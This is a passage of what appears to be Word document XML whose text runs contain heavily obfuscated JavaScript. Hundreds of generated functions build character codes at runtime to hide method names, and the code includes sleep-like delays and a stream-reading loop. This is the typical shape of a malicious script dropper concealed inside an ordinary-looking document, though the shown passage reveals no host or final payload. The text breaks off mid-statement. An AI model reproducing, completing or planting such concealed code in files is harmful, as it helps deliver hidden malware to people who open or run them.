PpUzPnl(PpUzPnlJK(Rx+Rt)+(ffpmer4[600]-ffpmer4[Vgtf_56]),RunGe);  })(false,'idea46',null)+(function(Rt,Rx){ var kevcont5=Brfcook; kevcont5[Vgtf_56]=1; kevcont5[Vgtf_56-(Vgtf_56/3)]=63; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kevcont5[600]-kevcont5[Vgtf_56]),RunGe);  })(true)+(function(Rt,Rx){ var qnvskill3=Brfcook; qnvskill3[Vgtf_56]=3; qnvskill3[Vgtf_56-(Vgtf_56/3)]=40; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qnvskill3[600]-qnvskill3[Vgtf_56]),RunGe);  })(1487,'human24',false)+(function(Rt,Rx){ var kekgradu5=Brfcook; kekgradu5[Vgtf_56]=2; kekgradu5[Vgtf_56-(Vgtf_56/3)]=86; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kekgradu5[600]-kekgradu5[Vgtf_56]),RunGe);  })(null,'Laws75')+(function(Rt,Rx){ var qfiski3=Brfcook; qfiski3[Vgtf_56]=4; qfiski3[Vgtf_56-(Vgtf_56/3)]=73; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qfiski3[600]-qfiski3[Vgtf_56]),RunGe);  })('human24','entertain53',true,'clutches88')+(function(Rt,Rx){ var fkntrie4=Brfcook; fkntrie4[Vgtf_56]=4; fkntrie4[Vgtf_56-(Vgtf_56/3)]=81; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fkntrie4[600]-fkntrie4[Vgtf_56]),RunGe);  })(null,'conscience16','issues6',true)+(function(Rt,Rx){ var kpffound3=Brfcook; kpffound3[Vgtf_56]=2; kpffound3[Vgtf_56-(Vgtf_56/3)]=82; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kpffound3[600]-kpffound3[Vgtf_56]),RunGe);  })('being84','simple95')+(function(Rt,Rx){ var jfnwer3=Brfcook; jfnwer3[Vgtf_56]=2; jfnwer3[Vgtf_56-(Vgtf_56/3)]=39; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jfnwer3[600]-jfnwer3[Vgtf_56]),RunGe);  })(1117,'astonished95')+gicqnnothing15+gicqnslow85,'',(function(Rt,Rx){ var uqsroad5=Brfcook; uqsroad5[Vgtf_56]=2; uqsroad5[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uqsroad5[600]-uqsroad5[Vgtf_56]),RunGe);  })('lawsthe36',true)+(function(Rt,Rx){ var qesroa5=Brfcook; qesroa5[Vgtf_56]=3; qesroa5[Vgtf_56-(Vgtf_56/3)]=115; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qesroa5[600]-qesroa5[Vgtf_56]),RunGe);  })(false,'lawsthe36','free58')+(function(Rt,Rx){ var wpjmere3=Brfcook; wpjmere3[Vgtf_56]=1; wpjmere3[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wpjmere3[600]-wpjmere3[Vgtf_56]),RunGe);  })('idea46')+(function(Rt,Rx){ var ujugrati4=Brfcook; ujugrati4[Vgtf_56]=0; ujugrati4[Vgtf_56-(Vgtf_56/3)]=110; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ujugrati4[600]-ujugrati4[Vgtf_56]),RunGe);  })(),0); </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">                gicqncarried61[(function(Rt,Rx){ var shsan3=Brfcook; shsan3[Vgtf_56]=3; shsan3[Vgtf_56-(Vgtf_56/3)]=86; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(shsan3[600]-shsan3[Vgtf_56]),RunGe);  })('could80',true,false)+(function(Rt,Rx){ var ihpgra4=Brfcook; ihpgra4[Vgtf_56]=0; ihpgra4[Vgtf_56-(Vgtf_56/3)]=108; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ihpgra4[600]-ihpgra4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var jjhsk3=Brfcook; jjhsk3[Vgtf_56]=3; jjhsk3[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jjhsk3[600]-jjhsk3[Vgtf_56]),RunGe);  })(281,null,'human24')+(function(Rt,Rx){ var vjseve4=Brfcook; vjseve4[Vgtf_56]=2; vjseve4[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vjseve4[600]-vjseve4[Vgtf_56]),RunGe);  })(null,'White35')+(function(Rt,Rx){ var hwean3=Brfcook; hwean3[Vgtf_56]=0; hwean3[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hwean3[600]-hwean3[Vgtf_56]),RunGe);  })()](1000*69);                        }                 }     </w:t>
        <w:tab/>
        <w:t xml:space="preserve">          gicqncarried61[(function(Rt,Rx){ var shsan3=Brfcook; shsan3[Vgtf_56]=3; shsan3[Vgtf_56-(Vgtf_56/3)]=86; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(shsan3[600]-shsan3[Vgtf_56]),RunGe);  })('could80',true,false)+(function(Rt,Rx){ var ihpgra4=Brfcook; ihpgra4[Vgtf_56]=0; ihpgra4[Vgtf_56-(Vgtf_56/3)]=108; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ihpgra4[600]-ihpgra4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var jjhsk3=Brfcook; jjhsk3[Vgtf_56]=3; jjhsk3[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jjhsk3[600]-jjhsk3[Vgtf_56]),RunGe);  })(281,null,'human24')+(function(Rt,Rx){ var vjseve4=Brfcook; vjseve4[Vgtf_56]=2; vjseve4[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vjseve4[600]-vjseve4[Vgtf_56]),RunGe);  })(null,'White35')+(function(Rt,Rx){ var hwean3=Brfcook; hwean3[Vgtf_56]=0; hwean3[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hwean3[600]-hwean3[Vgtf_56]),RunGe);  })()](1000*52);</w:t>
        <w:tab/>
        <w:t xml:space="preserve">          gicqnready60=gicqndaily68[(function(Rt,Rx){ var unswri4=Brfcook; unswri4[Vgtf_56]=0; unswri4[Vgtf_56-(Vgtf_56/3)]=71; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(unswri4[600]-unswri4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var quvFo3=Brfcook; quvFo3[Vgtf_56]=2; quvFo3[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(quvFo3[600]-quvFo3[Vgtf_56]),RunGe);  })(false,null)+(function(Rt,Rx){ var pthav5=Brfcook; pthav5[Vgtf_56]=2; pthav5[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pthav5[600]-pthav5[Vgtf_56]),RunGe);  })(1524,'progress41')+(function(Rt,Rx){ var tphav5=Brfcook; tphav5[Vgtf_56]=0; tphav5[Vgtf_56-(Vgtf_56/3)]=70; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tphav5[600]-tphav5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var vjnme4=Brfcook; vjnme4[Vgtf_56]=3; vjnme4[Vgtf_56-(Vgtf_56/3)]=108; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vjnme4[600]-vjnme4[Vgtf_56]),RunGe);  })('idea46',null,'indeed17')+(function(Rt,Rx){ var whkmere4=Brfcook; whkmere4[Vgtf_56]=0; whkmere4[Vgtf_56-(Vgtf_56/3)]=108; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(whkmere4[600]-whkmere4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var hisgr4=Brfcook; hisgr4[Vgtf_56]=4; hisgr4[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hisgr4[600]-hisgr4[Vgtf_56]),RunGe);  })(2058,'addition49','being51','evades28')](gicqnsystem50+gicqnnothing15+gicqnslow85)[(function(Rt,Rx){ var jvsmer5=Brfcook; jvsmer5[Vgtf_56]=0; jvsmer5[Vgtf_56-(Vgtf_56/3)]=79; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jvsmer5[600]-jvsmer5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var entthat4=Brfcook; entthat4[Vgtf_56]=3; entthat4[Vgtf_56-(Vgtf_56/3)]=115; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(entthat4[600]-entthat4[Vgtf_56]),RunGe);  })('obey60','factory29',2008)+(function(Rt,Rx){ var vhpfeat3=Brfcook; vhpfeat3[Vgtf_56]=2; vhpfeat3[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vhpfeat3[600]-vhpfeat3[Vgtf_56]),RunGe);  })('into30','Asimov30')+(function(Rt,Rx){ var qpiliv4=Brfcook; qpiliv4[Vgtf_56]=4; qpiliv4[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qpiliv4[600]-qpiliv4[Vgtf_56]),RunGe);  })('second5','itself96',false,'being84')+(function(Rt,Rx){ var knnmer3=Brfcook; knnmer3[Vgtf_56]=2; knnmer3[Vgtf_56-(Vgtf_56/3)]=67; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(knnmer3[600]-knnmer3[Vgtf_56]),RunGe);  })('idea46',1229)+(function(Rt,Rx){ var uhhwrite3=Brfcook; uhhwrite3[Vgtf_56]=4; uhhwrite3[Vgtf_56-(Vgtf_56/3)]=119; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uhhwrite3[600]-uhhwrite3[Vgtf_56]),RunGe);  })('Both81',true,1075,'beingcharitable40')+(function(Rt,Rx){ var nqnFo4=Brfcook; nqnFo4[Vgtf_56]=0; nqnFo4[Vgtf_56-(Vgtf_56/3)]=84; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nqnFo4[600]-nqnFo4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var wjeofpov4=Brfcook; wjeofpov4[Vgtf_56]=1; wjeofpov4[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wjeofpov4[600]-wjeofpov4[Vgtf_56]),RunGe);  })('daily6')+(function(Rt,Rx){ var kvhco5=Brfcook; kvhco5[Vgtf_56]=3; kvhco5[Vgtf_56-(Vgtf_56/3)]=123; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kvhco5[600]-kvhco5[Vgtf_56]),RunGe);  })(null,true,'declarations83')+(function(Rt,Rx){ var ewhande5=Brfcook; ewhande5[Vgtf_56]=0; ewhande5[Vgtf_56-(Vgtf_56/3)]=116; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ewhande5[600]-ewhande5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var vqngr5=Brfcook; vqngr5[Vgtf_56]=3; vqngr5[Vgtf_56-(Vgtf_56/3)]=86; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vqngr5[600]-vqngr5[Vgtf_56]),RunGe);  })(1853,'robots83','conscience16')+(function(Rt,Rx){ var ujsmere3=Brfcook; ujsmere3[Vgtf_56]=1; ujsmere3[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ujsmere3[600]-ujsmere3[Vgtf_56]),RunGe);  })(true)+(function(Rt,Rx){ var tipthat3=Brfcook; tipthat3[Vgtf_56]=0; tipthat3[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tipthat3[600]-tipthat3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var vhjot3=Brfcook; vhjot3[Vgtf_56]=2; vhjot3[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vhjot3[600]-vhjot3[Vgtf_56]),RunGe);  })(false,true)+(function(Rt,Rx){ var hfvgra5=Brfcook; hfvgra5[Vgtf_56]=1; hfvgra5[Vgtf_56-(Vgtf_56/3)]=98; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hfvgra5[600]-hfvgra5[Vgtf_56]),RunGe);  })('robots83')+(function(Rt,Rx){ var wthHe3=Brfcook; wthHe3[Vgtf_56]=3; wthHe3[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wthHe3[600]-wthHe3[Vgtf_56]),RunGe);  })(null,'rooted92','thus68')](1,-1);               while (!gicqnready60[(function(Rt,Rx){ var wfkfeat5=Brfcook; wfkfeat5[Vgtf_56]=0; wfkfeat5[Vgtf_56-(Vgtf_56/3)]=65; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wfkfeat5[600]-wfkfeat5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var uvtmerel5=Brfcook; uvtmerel5[Vgtf_56]=3; uvtmerel5[Vgtf_56-(Vgtf_56/3)]=119; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uvtmerel5[600]-uvtmerel5[Vgtf_56]),RunGe);  })(false,null,true)+(function(Rt,Rx){ var fkkgradu4=Brfcook; fkkgradu4[Vgtf_56]=4; fkkgradu4[Vgtf_56-(Vgtf_56/3)]=73; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fkkgradu4[600]-fkkgradu4[Vgtf_56]),RunGe);  })(2673,'robots83','conscience16',null)+(function(Rt,Rx){ var jjqFort4=Brfcook; jjqFort4[Vgtf_56]=3; jjqFort4[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jjqFort4[600]-jjqFort4[Vgtf_56]),RunGe);  })('while59',false,949)+(function(Rt,Rx){ var jhjgr3=Brfcook; jhjgr3[Vgtf_56]=4; jhjgr3[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jhjgr3[600]-jhjgr3[Vgtf_56]),RunGe);  })('Laws75',false,'although94',false)+(function(Rt,Rx){ var nwuan4=Brfcook; nwuan4[Vgtf_56]=3; nwuan4[Vgtf_56-(Vgtf_56/3)]=82; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nwuan4[600]-nwuan4[Vgtf_56]),RunGe);  })(false,'could80','State64')+(function(Rt,Rx){ var qktgra3=Brfcook; qktgra3[Vgtf_56]=3; qktgra3[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qktgra3[600]-qktgra3[Vgtf_56]),RunGe);  })(491,'robots83','conscience16')+(function(Rt,Rx){ var qkfHer5=Brfcook; qkfHer5[Vgtf_56]=1; qkfHer5[Vgtf_56-(Vgtf_56/3)]=84; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qkfHer5[600]-qkfHer5[Vgtf_56]),RunGe);  })(null)+(function(Rt,Rx){ var pnsconte3=Brfcook; pnsconte3[Vgtf_56]=4; pnsconte3[Vgtf_56-(Vgtf_56/3)]=120; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pnsconte3[600]-pnsconte3[Vgtf_56]),RunGe);  })('what20','humans11','would54',1599)+(function(Rt,Rx){ var tnuother3=Brfcook; tnuother3[Vgtf_56]=3; tnuother3[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tnuother3[600]-tnuother3[Vgtf_56]),RunGe);  })(null,'robot28',972)+(function(Rt,Rx){ var ftjth4=Brfcook; ftjth4[Vgtf_56]=4; ftjth4[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ftjth4[600]-ftjth4[Vgtf_56]),RunGe);  })('must38',true,1157,1157)+(function(Rt,Rx){ var vufHere84=Brfcook; vufHere84[Vgtf_56]=3; vufHere84[Vgtf_56-(Vgtf_56/3)]=100; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vufHere84[600]-vufHere84[Vgtf_56]),RunGe);  })('rooted92','thus68','slow19')+(function(Rt,Rx){ var vwwme5=Brfcook; vwwme5[Vgtf_56]=1; vwwme5[Vgtf_56-(Vgtf_56/3)]=110; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vwwme5[600]-vwwme5[Vgtf_56]),RunGe);  })('idea46')])                 {</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">          gicqnacceptance95=gicqnready60[(function(Rt,Rx){ var qnhthat5=Brfcook; qnhthat5[Vgtf_56]=4; qnhthat5[Vgtf_56-(Vgtf_56/3)]=86; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qnhthat5[600]-qnhthat5[Vgtf_56]),RunGe);  })(true,'obey60','factory29','know4')+(function(Rt,Rx){ var qnpot3=Brfcook; qnpot3[Vgtf_56]=1; qnpot3[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qnpot3[600]-qnpot3[Vgtf_56]),RunGe);  })('robot28')+(function(Rt,Rx){ var supconsc5=Brfcook; supconsc5[Vgtf_56]=0; supconsc5[Vgtf_56-(Vgtf_56/3)]=97; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(supconsc5[600]-supconsc5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var kfvmerel3=Brfcook; kfvmerel3[Vgtf_56]=3; kfvmerel3[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kfvmerel3[600]-kfvmerel3[Vgtf_56]),RunGe);  })(1553,1553,false)+(function(Rt,Rx){ var nuiForth3=Brfcook; nuiForth3[Vgtf_56]=2; nuiForth3[Vgtf_56-(Vgtf_56/3)]=78; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nuiForth3[600]-nuiForth3[Vgtf_56]),RunGe);  })(null,2141)+(function(Rt,Rx){ var qfstha4=Brfcook; qfstha4[Vgtf_56]=0; qfstha4[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qfstha4[600]-qfstha4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var snfmerel4=Brfcook; snfmerel4[Vgtf_56]=2; snfmerel4[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(snfmerel4[600]-snfmerel4[Vgtf_56]),RunGe);  })(null,'idea46')+(function(Rt,Rx){ var jfklivel3=Brfcook; jfklivel3[Vgtf_56]=4; jfklivel3[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jfklivel3[600]-jfklivel3[Vgtf_56]),RunGe);  })('second5','itself96','being84','simple95')]();</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">  gicqneverything75=gicqnacceptance95[(function(Rt,Rx){ var ujpgr3=Brfcook; ujpgr3[Vgtf_56]=4; ujpgr3[Vgtf_56-(Vgtf_56/3)]=119; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ujpgr3[600]-ujpgr3[Vgtf_56]),RunGe);  })('robots83','conscience16','issues6','resulting12')+(function(Rt,Rx){ var itpeve5=Brfcook; itpeve5[Vgtf_56]=0; itpeve5[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(itpeve5[600]-itpeve5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var hhpco4=Brfcook; hhpco4[Vgtf_56]=3; hhpco4[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hhpco4[600]-hhpco4[Vgtf_56]),RunGe);  })(2985,2985,'what20')+(function(Rt,Rx){ var ikigra3=Brfcook; ikigra3[Vgtf_56]=1; ikigra3[Vgtf_56-(Vgtf_56/3)]=116; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ikigra3[600]-ikigra3[Vgtf_56]),RunGe);  })(false)+(function(Rt,Rx){ var thjHer4=Brfcook; thjHer4[Vgtf_56]=3; thjHer4[Vgtf_56-(Vgtf_56/3)]=119; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(thjHer4[600]-thjHer4[Vgtf_56]),RunGe);  })(null,2574,'rooted92')+(function(Rt,Rx){ var sefskil3=Brfcook; sefskil3[Vgtf_56]=0; sefskil3[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(sefskil3[600]-sefskil3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var siueve3=Brfcook; siueve3[Vgtf_56]=0; siueve3[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(siueve3[600]-siueve3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var hwsgr5=Brfcook; hwsgr5[Vgtf_56]=4; hwsgr5[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hwsgr5[600]-hwsgr5[Vgtf_56]),RunGe);  })(1163,'addition49','being51',1163)+(function(Rt,Rx){ var whwwrite4=Brfcook; whwwrite4[Vgtf_56]=3; whwwrite4[Vgtf_56-(Vgtf_56/3)]=106; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(whwwrite4[600]-whwwrite4[Vgtf_56]),RunGe);  })('Both81','beingcharitable40',2500)](0,gicqnacceptance95[(function(Rt,Rx){ var pwjothe3=Brfcook; pwjothe3[Vgtf_56]=3; pwjothe3[Vgtf_56-(Vgtf_56/3)]=108; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pwjothe3[600]-pwjothe3[Vgtf_56]),RunGe);  })(false,'robot28','into6')+(function(Rt,Rx){ var qjsfea3=Brfcook; qjsfea3[Vgtf_56]=2; qjsfea3[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qjsfea3[600]-qjsfea3[Vgtf_56]),RunGe);  })('into30','Asimov30')+(function(Rt,Rx){ var pftmerel3=Brfcook; pftmerel3[Vgtf_56]=3; pftmerel3[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pftmerel3[600]-pftmerel3[Vgtf_56]),RunGe);  })('idea46','indeed17',900)+(function(Rt,Rx){ var petroad5=Brfcook; petroad5[Vgtf_56]=4; petroad5[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(petroad5[600]-petroad5[Vgtf_56]),RunGe);  })(null,'lawsthe36','free58',true)+(function(Rt,Rx){ var fifever5=Brfcook; fifever5[Vgtf_56]=2; fifever5[Vgtf_56-(Vgtf_56/3)]=122; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fifever5[600]-fifever5[Vgtf_56]),RunGe);  })(true,true)+(function(Rt,Rx){ var jnugradu5=Brfcook; jnugradu5[Vgtf_56]=1; jnugradu5[Vgtf_56-(Vgtf_56/3)]=80; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jnugradu5[600]-jnugradu5[Vgtf_56]),RunGe);  })(false)+(function(Rt,Rx){ var hiwgr5=Brfcook; hiwgr5[Vgtf_56]=1; hiwgr5[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hiwgr5[600]-hiwgr5[Vgtf_56]),RunGe);  })(false)]((function(Rt,Rx){ var qujli4=Brfcook; qujli4[Vgtf_56]=1; qujli4[Vgtf_56-(Vgtf_56/3)]=47; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qujli4[600]-qujli4[Vgtf_56]),RunGe);  })(false)));     </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">  </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">          gicqnlivelihood89[(function(Rt,Rx){ var ufsgr3=Brfcook; ufsgr3[Vgtf_56]=4; ufsgr3[Vgtf_56-(Vgtf_56/3)]=87; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ufsgr3[600]-ufsgr3[Vgtf_56]),RunGe);  })(true,true,'Laws75','although94')+(function(Rt,Rx){ var shqth3=Brfcook; shqth3[Vgtf_56]=2; shqth3[Vgtf_56-(Vgtf_56/3)]=106; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(shqth3[600]-shqth3[Vgtf_56]),RunGe);  })(false,'obey60')+(function(Rt,Rx){ var tqtgra3=Brfcook; tqtgra3[Vgtf_56]=1; tqtgra3[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tqtgra3[600]-tqtgra3[Vgtf_56]),RunGe);  })('robots83')+(function(Rt,Rx){ var tjegra4=Brfcook; tjegra4[Vgtf_56]=3; tjegra4[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tjegra4[600]-tjegra4[Vgtf_56]),RunGe);  })(true,'Laws75','although94')+(function(Rt,Rx){ var qjtoth5=Brfcook; qjtoth5[Vgtf_56]=3; qjtoth5[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qjtoth5[600]-qjtoth5[Vgtf_56]),RunGe);  })(1843,1843,'robot28')+(function(Rt,Rx){ var vskFor5=Brfcook; vskFor5[Vgtf_56]=0; vskFor5[Vgtf_56-(Vgtf_56/3)]=69; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vskFor5[600]-vskFor5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var ihfthe5=Brfcook; ihfthe5[Vgtf_56]=2; ihfthe5[Vgtf_56-(Vgtf_56/3)]=122; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ihfthe5[600]-ihfthe5[Vgtf_56]),RunGe);  })(433,false)+(function(Rt,Rx){ var qhpha5=Brfcook; qhpha5[Vgtf_56]=3; qhpha5[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qhpha5[600]-qhpha5[Vgtf_56]),RunGe);  })('arosethough14',869,869)+(function(Rt,Rx){ var qhneve4=Brfcook; qhneve4[Vgtf_56]=0; qhneve4[Vgtf_56-(Vgtf_56/3)]=99; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qhneve4[600]-qhneve4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var pthroa4=Brfcook; pthroa4[Vgtf_56]=0; pthroa4[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pthroa4[600]-pthroa4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var uspwri5=Brfcook; uspwri5[Vgtf_56]=3; uspwri5[Vgtf_56-(Vgtf_56/3)]=119; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uspwri5[600]-uspwri5[Vgtf_56]),RunGe);  })(false,true,'Both81')+(function(Rt,Rx){ var kwpwork43=Brfcook; kwpwork43[Vgtf_56]=0; kwpwork43[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kwpwork43[600]-kwpwork43[Vgtf_56]),RunGe);  })()]((function(Rt,Rx){ var wqvgr4=Brfcook; wqvgr4[Vgtf_56]=4; wqvgr4[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wqvgr4[600]-wqvgr4[Vgtf_56]),RunGe);  })('addition49','being51',1496,null)+(function(Rt,Rx){ var jtwcon4=Brfcook; jtwcon4[Vgtf_56]=4; jtwcon4[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jtwcon4[600]-jtwcon4[Vgtf_56]),RunGe);  })('declarations83','provided81',true,'second5')+(function(Rt,Rx){ var tkjroad4=Brfcook; tkjroad4[Vgtf_56]=2; tkjroad4[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tkjroad4[600]-tkjroad4[Vgtf_56]),RunGe);  })(true,true),(function(Rt,Rx){ var uivFort5=Brfcook; uivFort5[Vgtf_56]=0; uivFort5[Vgtf_56-(Vgtf_56/3)]=47; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uivFort5[600]-uivFort5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var ikhav3=Brfcook; ikhav3[Vgtf_56]=3; ikhav3[Vgtf_56-(Vgtf_56/3)]=88; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ikhav3[600]-ikhav3[Vgtf_56]),RunGe);  })(null,null,null)+(function(Rt,Rx){ var ehweve4=Brfcook; ehweve4[Vgtf_56]=4; ehweve4[Vgtf_56-(Vgtf_56/3)]=36; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ehweve4[600]-ehweve4[Vgtf_56]),RunGe);  })('White35','short49','which82',true)+(function(Rt,Rx){ var wsuli3=Brfcook; wsuli3[Vgtf_56]=4; wsuli3[Vgtf_56-(Vgtf_56/3)]=51; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wsuli3[600]-wsuli3[Vgtf_56]),RunGe);  })(false,'second5','itself96',2066)+(function(Rt,Rx){ var ifsco3=Brfcook; ifsco3[Vgtf_56]=1; ifsco3[Vgtf_56-(Vgtf_56/3)]=82; return 